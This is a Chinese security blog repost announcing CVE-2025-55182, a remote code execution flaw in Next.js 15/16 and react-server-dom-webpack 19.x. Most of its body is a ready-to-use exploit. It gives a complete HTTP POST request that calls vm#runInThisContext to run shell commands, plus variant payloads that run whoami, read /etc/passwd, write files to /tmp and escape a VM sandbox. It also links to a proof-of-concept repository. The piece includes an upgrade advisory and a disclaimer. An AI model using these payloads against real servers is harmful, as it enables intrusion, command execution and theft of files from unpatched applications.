文章总结： 文章披露高危漏洞CVE-2025-55182，影响Next.js15/16及ReactServerDOMWebpack19版本。攻击者可通过特制请求操纵参数，利用vm模块实现远程代码执行或文件读写。鉴于涉及几乎所有相关应用，建议立即升级组件修复此风险。 综合评分： 80 文章分类： 漏洞POC,漏洞分析,漏洞预警,WEB安全

大洞速修！已复现CVE-2025-55182

不秃头的安全

2025年12月4日 10:04 北京

以下文章来源于知攻善防实验室 ，作者ChinaRan404

知攻善防实验室 .

红蓝对抗，Web渗透测试，红队攻击，蓝队防守，内网渗透，漏洞分析，漏洞原理，开源 工具，社工钓鱼，网络安全。

几乎所有 Next.js 应用都使用了包含 fs 的包，真大洞！

受影响版本

react-server-dom-webpack: 19.0.0, 19.1.0, 19.1.1, 19.2.0

Next.js: 15.x, 16.x (App Router)

复现环境

复现环境运行

npm installnode --conditions react-server --conditions webpack src/server.js

没有安装 node.js自行安装一下

复现数据包：POST /formaction HTTP/1.1Host: localhost:3002Content-Type: multipart/form-data; boundary=----BoundaryContent-Length: 297------BoundaryContent-Disposition: form-data; name="$ACTION_REF_0"------BoundaryContent-Disposition: form-data; name="$ACTION_0:0"{"id":"vm#runInThisContext","bound":["global.process.mainModule.require(\"child_process\").execSync(\"id\").toString()"]}------Boundary--

其他变种

{ id: 'child_process#execSync', bound: ['whoami'] }{ id: 'fs#readFileSync', bound: ['/etc/passwd'] }{ id: 'fs#writeFileSync', bound: ['/tmp/pwned.txt', 'CVE-2025-55182'] }{  id: 'vm#runInThisContext',  bound: ['process.mainModule.require("child_process").execSync("id").toString()']}{  id: 'vm#runInNewContext',  bound: ['this.constructor.constructor("return process")().mainModule.require("child_process").execSync("whoami").toString()']}

复现环境下载：

https://github.com/ejpir/CVE-2025-55182-poc/https://pan.quark.cn/s/d72c76a455c5

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：不秃头的安全 《大洞速修！已复现CVE-2025-55182》